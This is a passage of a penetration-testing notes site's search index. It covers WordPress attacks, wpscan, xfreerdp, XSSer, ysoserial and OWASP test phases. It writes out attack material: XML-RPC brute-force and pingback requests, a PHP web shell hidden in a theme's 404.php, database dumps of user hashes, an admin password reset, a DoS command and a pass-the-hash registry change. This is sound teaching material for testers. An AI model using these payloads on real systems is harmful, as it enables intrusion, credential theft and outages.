                            • /wp-content/uploads/ - Directory where uploaded files are stored (Usually prone to directory listing).
                            • /wp-config.php - Contains information required by WordPress to connect to a database. (Contains database credentials)
                            ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#enumeration","title":"Enumeration","text":"","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#dorking-techniques","title":"Dorking techniques","text":"
                            inurl:\"/xmlrpc.php?rsd\" + scoping restrictions\n\nintitle:\"WordPress\" inurl:\"readme.html\" + scoping restrictions = general wordpress detection\n\nallinurl:\"wp-content/plugins/\" + scoping restrictions = general wordpress detection\n
                            ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#wordpress-version","title":"Wordpress version","text":"
                            # Using curl for getting generator meta tag\ncurl -s -X GET https://example.com | grep '<meta name=\"generator\"'\n\n# Using curl for getting version from src files \ncurl -s -X GET <URL> | grep http | grep -E '?ver' | sed -E 's,href==|src=,THIIIIS,g' | awk -F \"THIIIIS\" '{print $2}' | cut -d \"'\" -f2\n

                            Manual techniques

                            • Check WordPress Meta Generator Tag.
                            • Check the WordPress readme.html/license.txt file.
                            • Inspect HTTP response headers for version information (X-Powered-By).
                            • Check the login page for the WordPress version as it is usually displayed.
                            • Check the WordPress REST API and look for the version field in the JSON response (http://example.com/wp-json/)
                            • Analyze JS and CSS files for version information.
                            • Examine the WordPress changelog files with information on version updates. Look for files like changelog.txt or readme.txt in the WordPress directory
                            ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#plugin-enumeration","title":"Plugin enumeration","text":"
                            # curl\ncurl -s -X GET http://example.com | sed 's/href=/\\n/g' | sed 's/src=/\\n/g' | grep 'wp-content/plugins/*' | cut -d\"'\" -f2\n\n# wpscan\nwpscan --url http://<TARGET> --plugins-detection passive\n# Modes: -mixed (default), -passive or -active\n
                            ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#themes-enumeration","title":"Themes enumeration","text":"
                            # Using curl\ncurl -s -X GET http://example.com | sed 's/href=/\\n/g' | sed 's/src=/\\n/g' | grep 'themes' | cut -d\"'\" -f2\n
                            ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#user-enumeration","title":"User enumeration","text":"
                            # Using curl\ncurl -s -I -X GET http://blog.inlanefreight.com/?author=1\n\n# json enumeration\ncurl http://blog.inlanefreight.com/wp-json/wp/v2/users | jq\n\n# wpscan\nwpscan --url https://target.tld/domain --enumerate u\nwpscan --url https://target.tld/ -eu\n\n# Enumerate a range of users 1-100\nwpscan --url https://target.tld/ --enumerate u1-100\nwpscan --url http://46.101.13.204:31822 --plugins-detection passive\n

                            Manual method: users in wordpress have unique identifiers. Usually first user in wordpress has id 1. Second user, id 2. So in the browser you can write:

                            http://example.com/wordpressPath?author=1\n
                            ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#nmap-enumeration","title":"nmap enumeration","text":"
                            # List nmap scripts related to wordpress\nls -la /usr/share/nmap/scripts | grep wordpress\n

                            Results:

                            -rw-r--r-- 1 root root  5061 Nov  1 22:10 http-wordpress-brute.nse\n-rw-r--r-- 1 root root 10866 Nov  1 22:10 http-wordpress-enum.nse\n-rw-r--r-- 1 root root  4641 Nov  1 22:10 http-wordpress-users.nse\n

                            Running one of them:

                            # General enumeration\nsudo nmap -sS -sV --script=http-wordpress-enum <TARGETwithnohttp> \n\n# Plugins enumeration\nsudo nmap -sS -sV --script=http-wordpress-enum --script-args type=\"plugins\" <TARGETwithnohttp> -p 80,443\n\n# User enumeration\nsudo nmap -sS -sV --script=http-wordpress-users <TARGETwithnohttp> \n
                            ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#brute-force-attack-on-login","title":"Brute force attack on login","text":"

                            Usually, login form is located at example.com/wp-admin/login.php

                            But sometimes, login form is hidden under a different path. There exist plugins to do so.

                            # Brute force attack with passwords\nwpscan --url HOST/domain -usernames admin, webadmin  --password-attack wp-login -passwords filename.txt\n# -usernames: those users that you are going to brute force\n# --password-attack: your URI target (different in the case of the WP api\n# -passwords: path/to/dictionary.txt\n\n\nwpscan --url  <targetURLnohttp> -U admin -P /usr/share/wordlists/rockyou.txt   \n
                            ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#enumerating-files-and-folders","title":"Enumerating files and folders","text":"
                            # Using gobuster\ngobuster dir --url https://example.com --wordlist /usr/share/seclists/Discovery/Web-Content/CMS/wordpress.fuzz.txt -b '404'\n

                            Check out if directory listing is enabled.

                            ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#wordpress-xmlrpc-attacks","title":"WordPress xmlrpc attacks","text":"

                            XML-RPC on WordPress is actually an API that allows developers who make 3rd party application and services the ability to interact to your WordPress site. The XML-RPC API that WordPress provides several key functionalities that include:

                            • Publish a post.
                            • Edit a post.
                            • Delete a post.
                            • Upload a new file (e.g. an image for a post).
                            • Get a list of comments.
                            • Edit comments.

                            XML-RPC functionality is turned on by default since WordPress 3.5. Therefore, normal installation of wordpress allows us to perform two type of attacks:

                            • XML-rpc ping attacks.
                            • Brute force attack.

                            Before attacking, we need to make sure that there exist XML-RPC servers on the wordpress installation:

                            1. Ensure you have access to the xmlrpc.php file (usually at https://example.com/xmlrpc.php).

                            2. Send a POST request: .

                            POST /xmlrpc.php HTTP/1.1\nHost: example.com\nContent-Length: 135\n\n<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<methodCall> \n<methodName>system.listMethods</methodName> \n<params></params> \n</methodCall>\n

                            Same request with curl would be:

                            curl -X POST -d \"<?xml version=\\\"1.0\\\" encoding=\\\"utf-8\\\"?> <methodCall> <methodName>system.listMethods</methodName> <params></params></methodCall>\" http://example.com/xmlrpc.php\n

                            Normal response to this request would be listing all available methods.

                            This is how you trigger the method blogger.getUsersBlogs:

                            ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#xml-rpc-brute-force-attack","title":"XML-RPC brute force attack","text":"

                            With wpscan:

                            wpscan --password-attack xmlrpc -t 20 -U admin, david -P passwords.txt --url http://<TARGET>\n

                            Use BurpSuite Intruder to send this request:

                            POST /xmlrpc.php HTTP/1.1\nHost: example.com\nContent-Length: 235\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<methodCall> \n<methodName>wp.getUsersBlogs</methodName> \n<params> \n<param><value>\\{\\{your username\\}\\}</value></param> \n<param><value>\\{\\{your password\\}\\}</value></param> \n</params> \n</methodCall>\n

                            You can also perform a single request, and brute force hundreds of passwords. For that you need to use both system.multicall and wp.getUsersBlogs methods:

                            POST /xmlrpc.php HTTP/1.1\nHost: example.com\nContent-Length: 1560\n\n<?xml version=\"1.0\"?>\n<methodCall><methodName>system.multicall</methodName><params><param><value><array><data>\n\n<value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><data><value><array><data><value><string>\\{\\{ Your Username \\}\\}</string></value><value><string>\\{\\{ Your Password \\}\\}</string></value></data></array></value></data></array></value></member></struct></value>\n\n<value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><data><value><array><data><value><string>\\{\\{ Your Username \\}\\}</string></value><value><string>\\{\\{ Your Password \\}\\}</string></value></data></array></value></data></array></value></member></struct></value>\n\n<value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><data><value><array><data><value><string>\\{\\{ Your Username \\}\\}</string></value><value><string>\\{\\{ Your Password \\}\\}</string></value></data></array></value></data></array></value></member></struct></value>\n\n<value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><data><value><array><data><value><string>\\{\\{ Your Username \\}\\}</string></value><value><string>\\{\\{ Your Password \\}\\}</string></value></data></array></value></data></array></value></member></struct></value>\n\n</data></array></value></param></params></methodCall>\n
                            ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#xml-rpc-uploading-a-file","title":"XML-RPC uploading a file","text":"

                            Using the correct credentials you can upload a file. In the response the path will appears (source for this: hacktricks):

                            <?xml version='1.0' encoding='utf-8'?>\n<methodCall>\n    <methodName>wp.uploadFile</methodName>\n    <params>\n        <param><value><string>1</string></value></param>\n        <param><value><string>username</string></value></param>\n        <param><value><string>password</string></value></param>\n        <param>\n            <value>\n                <struct>\n                    <member>\n                        <name>name</name>\n                        <value><string>filename.jpg</string></value>\n                    </member>\n                    <member>\n                        <name>type</name>\n                        <value><string>mime/type</string></value>\n                    </member>\n                    <member>\n                        <name>bits</name>\n                        <value><base64><![CDATA[---base64-encoded-data---]]></base64></value>\n                    </member>\n                </struct>\n            </value>\n        </param>\n    </params>\n</methodCall>\n
                            ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#xml-rpc-pingback-attack-distributed-denial-of-service-ddos-attacks","title":"XML-RPC pingback attack: Distributed denial-of-service (DDoS) attacks","text":"

                            An attacker executes the pingback.ping the method from several affected WordPress installations against a single unprotected target (botnet level).

                            ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#xml-rpc-pingback-attack-cloudflare-protection-bypass","title":"XML-RPC pingback attack: Cloudflare Protection Bypass","text":"

                            An attacker executes the pingback.ping the method from a single affected WordPress installation which is protected by CloudFlare to an attacker-controlled public host (for example a VPS) in order to reveal the public IP of the target, therefore bypassing any DNS level protection.

                            ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#xml-rpc-pingback-attack-xspa-cross-site-port-attack","title":"XML-RPC pingback attack: XSPA (Cross Site Port Attack)","text":"

                            An attacker can execute the pingback.ping the method from a single affected wordpress installation to the same host (or other internal/private host) on different ports. An open port or an internal host can be determined by observing the difference in time of response and/or by looking at the response of the request.

                            The following represents an simple example request using the Burpsuite Collaborator provided URL as callback:

                            POST /xmlrpc.php HTTP/1.1\nHost: example.com\nContent-Length: 303\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<methodCall>\n<methodName>pingback.ping</methodName>\n<params>\n<param>\n<value><string>https://pdaskjdasas23fselrkfdsf.oastify.com/1562017983221-4377199190203</string></value>\n</param>\n<param>\n<value><string>https://example.com/</string></value>\n</param>\n</params>\n</methodCall>\n
                            # Brute force with curl\ncurl -X POST -d \"<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>admin</value></param><param><value>CORRECT-PASSWORD</value></param></params></methodCall>\" http://blog.inlanefreight.com/xmlrpc.php\n\n# If the credentials are not valid, we will receive a 403 faultCode error.\n
                            ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#rce-attack-on-wordpress","title":"RCE attack on wordpress","text":"

                            Once you have credentials for user admin, access the admin panel and introduce a web shell. Where? Appearance > Theme editor. Choose a theme not in use and edit 404.php to add the shell. This is a quiet way not to be noticed.

                            At the end of the file, you can add:

                            system($_GET['cmd']);\n

                            Exploitation:

                            curl -X GET \"http://<target>/wp-content/themes/twentyseventeen/404.php?cmd=id\"\n
                            ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#metasploit-modules","title":"Metasploit modules","text":"
                            use exploit/unix/webapp/wp_admin_shell_upload\n
                            ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#interesting-files","title":"Interesting files","text":"

                            If somehow we get our hands on wp-config.php, then we will be able to see credentials to database.

                            ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#post-exploitation","title":"Post Exploitation","text":"

                            Extract usernames and passwords:

                            mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e \"use wordpress;select concat_ws(':', user_login, user_pass) from wp_users;\"\n

                            Change admin password:

                            mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e \"use wordpress;UPDATE wp_users SET user_pass=MD5('hacked') WHERE ID = 1;\"\n
                            ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#wp-cronphp-attack","title":"wp-cron.php attack","text":"

                            The WordPress application is vulnerable to a Denial of Service (DoS) attack via the wp-cron.php script. This script is used by WordPress to perform scheduled tasks, such as publishing scheduled posts, checking for updates, and running plugins.

                            An attacker can exploit this vulnerability by sending a large number of requests to the wp-cron.php script, causing it to consume excessive resources and overload the server. This can lead to the application becoming unresponsive or crashing, potentially causing data loss and downtime.

                            Steps to Reproduce:

                            • Get the doser.py script at https://github.com/Quitten/doser.py
                            • Use this command to run the script:
                            python3 doser.py -t 999 -g 'https://\u2588\u2588\u2588\u2588\u2588/wp-cron.php'\n
                            • Go to https://\u2588\u2588\u2588\u2588 after 1000 requests of the doser.py script. The site returns code 502. See the video PoC.

                            To mitigate this vulnerability, it is recommended to disable the default WordPress wp-cron.php script and set up a server-side cron job instead. Here are the steps to disable the default wp-cron.php script and set up a server-side cron job:

                            1. Access your website\u2019s root directory via FTP or cPanel File Manager.
                            2. Locate the wp-config.php file and open it for editing.
                            3. Add the following line of code to the file, just before the line that says \u201cThat\u2019s all, stop editing! Happy publishing.\u201d:
                            define('DISABLE_WP_CRON',\u00a0true);\n
                            1. Save the changes to the wp-config.php file.
                            2. Set up a server-side cron job to run the wp-cron.php script at the desired interval. This can be done using the server\u2019s control panel or by editing the server\u2019s crontab file.
                            ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#tools","title":"Tools","text":"

                            wpscan

                            ","tags":["wordpress","pentesting","CMS"]},{"location":"wpscan/","title":"wpscan - Wordpress Security Scanner","text":"","tags":["pentesting","web pentesting","enumeration","wordpress"]},{"location":"wpscan/#installation","title":"Installation","text":"

                            Preinstalled in kali.

                            See the repo: https://github.com/wpscanteam/wpscan.

                            WPScan keeps a local database of metadata that is used to output useful information, such as the latest version of a plugin. The local database can be updated with the following command:

                            wpscan --update\n
                            ","tags":["pentesting","web pentesting","enumeration","wordpress"]},{"location":"wpscan/#basic-commands","title":"Basic commands","text":"
                            # Enumerate users\nwpscan --url https://target.tld/domain --enumerate u\nwpscan --url https://target.tld/ -eu\n\n# Enumerate a range of users 1-100\nwpscan --url https://target.tld/ --enumerate u1-100\nwpscan --url http://46.101.13.204:31822 --plugins-detection passive\n\n# Brute force attack on login page with passwords:\nwpscan --url HOST/domain -usernames admin, webadmin  --password-attack wp-login -passwords filename.txt\n# -usernames: those users that you are going to brute force\n# --password-attack: your URI target (different in the case of the WP api\n# -passwords: path/to/dictionary.txt\n\n# Brute force attack on xmlrpc with passwords:\nwpscan --password-attack xmlrpc -t 20 -U username1, username2 -P PATH/TO/passwords.txt --url http://<TARGET>\n\n\n# Enumerate plugins on pasive mode \nwpscan --url https://target.tld/ --plugins-detection passive \n# Modes: -mixed (default), -passive or -active\n\n# Common flags\n#   vp (Vulnerable plugins)\n#   ap (All plugins)\n#   p (Popular plugins)\n#   vt (Vulnerable themes)\n#   at (All themes)\n#   t (Popular themes)\n#   tt (Timthumbs)\n#   cb (Config backups)\n#   dbe (Db exports)\n#   u (User IDs range. e.g: u1-5)\n#   m (Media IDs range. e.g m1-15)\n\n# Ignore HTTPS Certificate\n--disable-tls-checks\n
                            ","tags":["pentesting","web pentesting","enumeration","wordpress"]},{"location":"wpscan/#examples-from-labs","title":"Examples from labs:","text":"
                            # Raven 1 machine\nwpscan --url http://192.168.56.104/wordpress --enumerate u --force --wp-content-dir wp-content\n
                            ","tags":["pentesting","web pentesting","enumeration","wordpress"]},{"location":"xfreerdp/","title":"xfreerdp","text":"

                            xfreerdp is an X11 Remote Desktop Protocol (RDP) client which is part of the FreeRDP project. An RDP server is built-in to many editions of Windows.

                            ","tags":["tools","windows","rdp"]},{"location":"xfreerdp/#installation","title":"Installation","text":"

                            To install xfreerdp, proceed with the following command:

                            sudo apt-get install freerdp2-x11\n
                            ","tags":["tools","windows","rdp"]},{"location":"xfreerdp/#basic-commands","title":"Basic commands","text":"
                            # No password indicated. When prompted for one, click Enter and see if it allows us to login\nxfreerdp [/d:domain] /u:<username> /v:$ip\n\nxfreerdp [/d:domain] /u:<username> /p:<password> /v:$ip\n# /v:{target_IP} : Specifies the target IP of the host we would like to connect to.\n\nxfreerdp [/d:domain] /u:<username> /pth:<hash> /v:$ip\n# /pth:<hash>   Pass the hash\n
                            ","tags":["tools","windows","rdp"]},{"location":"xfreerdp/#troubleshoot-in-pth-attack","title":"Troubleshoot in PtH attack","text":"

                            Restricted Admin Mode, which is disabled by default, should be enabled on the target host; otherwise, you will be presented with an error. This can be enabled by adding a new registry key DisableRestrictedAdmin (REG_DWORD) under HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Lsa with the value of 0. It can be done using the following command:

                            reg add HKLM\\System\\CurrentControlSet\\Control\\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f\n

                            Once the registry key is added, we can use xfreerdp with the option /pth to gain RDP access.

                            ","tags":["tools","windows","rdp"]},{"location":"xsltproc/","title":"xsltproc","text":"

                            xsltproc is a command line tool for applying XSLT stylesheets to XML documents.

                            ","tags":["pentesting","tool","reporting","nmap"]},{"location":"xsltproc/#installation","title":"Installation","text":"

                            Preinstalled in kali. See oficial site: http://xmlsoft.org/xslt/xsltproc.html

                            ","tags":["pentesting","tool","reporting","nmap"]},{"location":"xsltproc/#basic-usage","title":"Basic usage","text":"
                            xsltproc target.xml -o target.html\n
                            ","tags":["pentesting","tool","reporting","nmap"]},{"location":"xsser/","title":"XSSer - An automated web pentesting framework tool to detect and exploit XSS vulnerabilities","text":"

                            A Cross Site Scripter (or XSSer) is an automatic framework to detect, exploit and report XSS vulnerabilities in web-based applications. It contains several options to try to bypass certain filters, and various special techniques of code injection. XSSer has pre-installed ( > 1300 XSS ) attacking vectors and can bypass-exploit code on several browsers/WAFs.

                            ","tags":["pentesting","web pentesting"]},{"location":"xsser/#installation","title":"Installation","text":"
                            sudo apt install xsser\n
                            ","tags":["pentesting","web pentesting"]},{"location":"xsser/#usage","title":"Usage","text":"

                            Capture with BurpSuite a POST request and fuzz it with XSSER:

                            xsser --url \"http://demo.ine.local/index.php?page=dns-lookup.php\" -p \"target_host=XSS&dns-lookup-php-submit-button=Lookup+DNS\" --auto\n# --url: to introduce the target\n# -p: Payload (it's the body of the POST request captured with Burpsuite). Use the characters 'XSS' to indicate where you want to inject the payloads that xsser is going to fuzz.\n#--auto: Inject a list of vectors provided by XSSer.\n# In the results you will have a confirmation about that parameter being injectable, and an example of payload. Use it for launching the Final Payload (-Fp).\n\nxsser --url \"http://demo.ine.local/index.php?page=dns-lookup.php\" -p \"target_host=XSS&dns-lookup-php-submit-button=Lookup+DNS\" --Fp \"<script>alert(1)</script>\"\n

                            With this, the encoded XSS payload is generated. Now, in Burp Suite, replace the POST parameters with the final attack payload and forward the request.

                            Launch the XSSer interface:

                            xsser --gtk\n
                            ","tags":["pentesting","web pentesting"]},{"location":"ysoserial/","title":"ysoserial - A tool for Java deserialization","text":"","tags":["webpentesting","tools","deserialization","java"]},{"location":"ysoserial/#installation","title":"Installation","text":"

                            Repository: https://github.com/frohoff/ysoserial

                            git clone https://github.com/frohoff/ysoserial.git\n

                            Requires Java 1.7+ and Maven 3.x+

                            sudo apt-get install maven\n

                            As ysoserial presented some issues with java 21 version, be sure of your version

                            java --version\n

                            Check your installations:

                            sudo update-alternatives --config java\n

                            Results:

                              Selection    Path                                         Priority   Status\n------------------------------------------------------------\n* 0            /usr/lib/jvm/java-21-openjdk-amd64/bin/java   2111      auto mode\n  1            /usr/lib/jvm/java-17-openjdk-amd64/bin/java   1711      manual mode\n  2            /usr/lib/jvm/java-21-openjdk-amd64/bin/java   2111      manual mode\n

                            Download Java 11:

                            sudo apt-get install openjdk-11-jdk \n

                            Run again

                            sudo update-alternatives --config java\n

                            And select the new installation. Then check out java version:

                            Additional debugging: Java not found in \u201cupdate-alternatives \u2014 config java\u201d after installing java on linux

                            After using ysoserial you may reconfigure to use your latest java version.

                            Build the app:

                            mvn clean package -DskipTests\n
                            ","tags":["webpentesting","tools","deserialization","java"]},{"location":"ysoserial/#basic-usage","title":"Basic usage","text":"
                            java -jar ysoserial-all.jar [payload] \"[command]\"\n

                            See lab: Burpsuite Lab

                            In Java versions 16 and above, you need to set a series of command-line arguments for Java to run ysoserial. For example:

                            java -jar ysoserial-all.jar \\ --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED \\ --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED \\ --add-opens=java.base/java.net=ALL-UNNAMED \\ --add-opens=java.base/java.util=ALL-UNNAMED \\ [payload] '[command]'\n
                            ","tags":["webpentesting","tools","deserialization","java"]},{"location":"OWASP/","title":"OWASP Web Security Testing Guide","text":"Phase Name of phase Objectives 1 Pre\u2013Engagement Define the scope and objectives of the penetration test, including the target web application, URLs, and functionalities to be tested. Obtain proper authorization and permission from the application owner to conduct the test. Gather relevant information about the application, such as technologies used, user roles, and business-critical functionalities. 2 Information Gathering & Reconnaissance Perform passive reconnaissance to gather publicly available information about the application and its infrastructure. Enumerate subdomains, directories, and files to discover hidden or sensitive content. Use tools like \"Nmap\" to identify open ports and services running on the web server. Utilize \"Google Dorks\" to find indexed information, files, and directories on the target website. 3 Threat Modeling Analyze the application's architecture and data flow to identify potential threats and attack vectors. Build an attack surface model to understand how attackers can interact with the application. Identify potential high-risk areas and prioritize testing efforts accordingly. 4 Vulnerability Scanning Use automated web vulnerability scanners like \"Burp Suite\" or \"OWASP ZAP\" to identify common security flaws. Verify and validate the scan results manually to eliminate false positives and false negatives. 5 Manual Testing & Exploitation Perform manual testing to validate and exploit identified vulnerabilities in the application. Test for input validation issues, authentication bypass, authorization flaws, and business logic vulnerabilities. Attempt to exploit security flaws to demonstrate their impact and potential risk to the application. 6 Authentication & Authorization Testing Test the application's authentication mechanisms to identify weaknesses in password policies, session management, and account lockout procedures. Evaluate the application's access controls to ensure that unauthorized users cannot access sensitive functionalities or data. 7 Session Management Testing Evaluate the application's session management mechanisms to prevent session fixation, session hijacking, and session-related attacks. Check for session timeout settings and proper session token handling. 8 Information Disclosure Review how the application handles sensitive information such as passwords, user data, and confidential files. Test for information disclosure through error messages, server responses, or improper access controls. 9 Business Logic Testing Analyze the application's business logic to identify flaws that could lead to unauthorized access or data manipulation. Test for order-related vulnerabilities, privilege escalation, and other business logic flaws. 10 Client-Side Testing Evaluate the client-side code (HTML, JavaScript) for potential security vulnerabilities, such as DOM-based XSS. Test for insecure client-side storage and sensitive data exposure. 11 Reporting & Remediation Document and prioritize the identified security vulnerabilities and risks. Provide a detailed report to developers and stakeholders, including recommendations for remediation. Assist developers in fixing the identified security issues and retesting the application to ensure that the fixes were successful. 12 Post-Engagement Conduct a post-engagement meeting to discuss the test results with stakeholders. Provide security awareness training to the development team to promote secure coding practices.

                            Other methodologies: http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines PTES is a complete penetration testing methodology that covers all aspects of security assessments, including web application testing. It provides a structured approach from pre-engagement through reporting and follow-up, making it suitable for comprehensive assessments

                            ","tags":["pentesting","web","pentesting","exploitation"]},{"location":"OWASP/#1-information-gathering","title":"1. Information Gathering","text":"1. Information Gathering ID Link to Hackinglife Link to OWASP Description 1.1 WSTG-INFO-01 Conduct Search Engine Discovery Reconnaissance for Information Leakage - Identify what sensitive design and configuration information of the application, system, or organization is exposed directly (on the organization's website) or indirectly (via third-party services). 1.2 WSTG-INFO-02 Fingerprint Web Server - Determine the version and type of a running web server to enable further discovery of any known vulnerabilities. 1.3 WSTG-INFO-03 Review Webserver Metafiles for Information Leakage - Identify hidden or obfuscated paths and functionality through the analysis of metadata files (robots.txt, \\ tag, sitemap.xml) - Extract and map other information that could lead to a better understanding of the systems at hand. 1.4 WSTG-INFO-04 Enumerate Applications on Webserver - Enumerate the applications within the scope that exist on a web server. - Find applications hosted in the webserver (Virtual hosts/Subdomain), non-standard ports, DNS zone transfers 1.5 WSTG-INFO-05 Review Webpage Content for Information Leakage - Review webpage comments, metadata, and redirect bodies to find any information leakage.- Gather JavaScript files and review the JS code to better understand the application and to find any information leakage. - Identify if source map files or other front-end debug files exist. 1.6 WSTG-INFO-06 Identify Application Entry Points - Identify possible entry and injection points through request and response analysis which covers hidden fields, parameters, methods HTTP header analysis 1.7 WSTG-INFO-07 Map Execution Paths Through Application - Map the target application and understand the principal workflows. - Use HTTP(s) Proxy Spider/Crawler feature aligned with application walkthrough 1.8 WSTG-INFO-08 Fingerprint Web Application Framework - Fingerprint the components being used by the web applications. - Find the type of web application framework/CMS from HTTP headers, Cookies, Source code, Specific files and folders, Error message. 1.9 WSTG-INFO-09 Fingerprint Web Application N/A, This content has been merged into: WSTG-INFO-08 1.10 WSTG-INFO-10 Map Application Architecture - Understand the architecture of the application and the technologies in use. - Identify application architecture whether on Application and Network components: Applicaton: Web server, CMS, PaaS, Serverless, Microservices, Static storage, Third party services/APIs, Network and Security: Reverse proxy, IPS, WAF","tags":["pentesting","web","pentesting","exploitation"]},{"location":"OWASP/#2-configuration-and-deploy-management-testing","title":"2. Configuration and Deploy Management Testing","text":"2. Configuration and Deploy Management Testing ID Link to Hackinglife Link to OWASP Description 2.1 WSTG-CONF-01 Test Network Infrastructure Configuration - Review the applications' configurations set across the network and validate that they are not vulnerable. - Validate that used frameworks and systems are secure and not susceptible to known vulnerabilities due to unmaintained software or default settings and credentials. 2.2 WSTG-CONF-02.md Test Application Platform Configuration - Ensure that defaults and known files have been removed. - Review configuration and server handling (40, 50) - Validate that no debugging code or extensions are left in the production environments. - Review the logging mechanisms set in place for the application including Log Location, Log Storage , Log Rotation, Log Access Control, Log Review 2.3 WSTG-CONF-03.md Test File Extensions Handling for Sensitive Information - Dirbust sensitive file extensions, or extensions that might contain raw data (e.g. scripts, raw data, credentials, etc.). - Find important file, information (.asa , .inc , .sql ,zip, tar, pdf, txt, etc) - Validate that no system framework bypasses exist on the rules set. 2.4 WSTG-CONF-04 Review Old Backup and Unreferenced Files for Sensitive Information - Find and analyse unreferenced files that might contain sensitive information. - Check JS source code, comments, cache file, backup file (.old, .bak, .inc, .src) and guessing of filename 2.5 WSTG-CONF-05 Enumerate Infrastructure and Application Admin Interfaces - Identify hidden administrator interfaces and functionality. - Directory and file enumeration, comments and links in source (/admin, /administrator, /backoffice, /backend, etc), alternative server port (Tomcat/8080) 2.6 WSTG-CONF-06 Test HTTP Methods - Enumerate supported HTTP methods using OPTIONS. - Test for access control bypass (GET->HEAD->FOO). - Test HTTP method overriding techniques. 2.7 WSTG-CONF-07 Test HTTP Strict Transport Security - Review the HSTS header and its validity. - Identify HSTS header on Web server through HTTP response header: curl -s -D- https://domain.com/ | 2.8 WSTG-CONF-08 Test RIA Cross Domain Policy Analyse the permissions allowed from the policy files (crossdomain.xml/clientaccesspolicy.xml) and allow-access-from. 2.9 WSTG-CONF-09 Test File Permission - Review and Identify any rogue file permissions. - Identify configuration file whose permissions are set to world-readable from the installation by default. 2.10 WSTG-CONF-10 Test for Subdomain Takeover - Enumerate all possible domains (previous and current). - Identify forgotten or misconfigured domains. 2.11 WSTG-CONF-11 Test Cloud Storage - Assess that the access control configuration for the storage services is properly in place. 2.12 WSTG-CONF-12 Testing for Content Security Policy - Review the Content-Security-Policy header or meta element to identify misconfigurations. 2.13 WSTG-CONF-13 Test Path Confusion - Make sure application paths are configured correctly.","tags":["pentesting","web","pentesting","exploitation"]},{"location":"OWASP/#3-identity-management-testing","title":"3. Identity Management Testing","text":"3. Identity Management Testing ID Link to Hackinglife Link to OWASP Description 3.1 WSTG-IDNT-01 Test Role Definitions - Identify and document roles used by the application. - Attempt to switch, change, or access another role. - Review the granularity of the roles and the needs behind the permissions given. 3.2 WSTG-IDNT-02 Test User Registration Process - Verify that the identity requirements for user registration are aligned with business and security requirements. - Validate the registration process. 3.3 WSTG-IDNT-03 Test Account Provisioning Process - Verify which accounts may provision other accounts and of what type. 3.4 WSTG-IDNT-04 Testing for Account Enumeration and Guessable User Account - Review processes that pertain to user identification (e.g. registration, login, etc.). - Enumerate users where possible through response analysis. 3.5 WSTG-IDNT-05 Testing for Weak or Unenforced Username Policy - Determine whether a consistent account name structure renders the application vulnerable to account enumeration. - User account names are often highly structured (e.g. Joe Bloggs account name is jbloggs and Fred Nurks account name is fnurks) and valid account names can easily be guessed. - Determine whether the application's error messages permit account enumeration.","tags":["pentesting","web","pentesting","exploitation"]},{"location":"OWASP/#4-authentication-testing","title":"4. Authentication Testing","text":"4. Authentication Testing ID Link to Hackinglife Link to OWASP Description 4.1 WSTG-ATHN-01 Testing for Credentials Transported over an Encrypted Channel N/A, This content has been merged into: WSTG-CRYP-03 4.2 WSTG-ATHN-02 Testing for Default Credentials - Determine whether the application has any User accounts with default passwords. 4.3 WSTG-ATHN-03 Testing for Weak Lock Out Mechanism - Evaluate the account lockout mechanism's ability to mitigate brute force password guessing. - Evaluate the unlock mechanism's resistance to unauthorized account unlocking. 4.4 WSTG-ATHN-04 Testing for Bypassing Authentication Schema - Ensure that authentication is applied across all services that require it. - Force browsing (/admin/main.php, /page.asp?authenticated=yes), Parameter Modification, Session ID prediction, SQL Injection 4.5 WSTG-ATHN-05 Testing for Vulnerable Remember Password - Validate that the generated session is managed securely and do not put the user's credentials in danger (e.g., cookie) - Verify that the credentials are not stored in clear text, but are hashed. Autocompleted=off? 4.6 WSTG-ATHN-06 Testing for Browser Cache Weaknesses - Review if the application stores sensitive information on the client-side. - Review if access can occur without authorization. - Check browser history issue by clicking \"Back\" button after logging out. - Check browser cache issue from HTTP response headers (Cache-Control: nocache) 4.7 WSTG-ATHN-07 Testing for Weak Password Policy - Determine the resistance of the application against brute Force password guessing using available password dictionaries by evaluating the length, complexity, reuse, and aging requirements of passwords. - Review whether new User accounts are created with weak or predictable passwords. 4.8 WSTG-ATHN-08 Testing for Weak Security 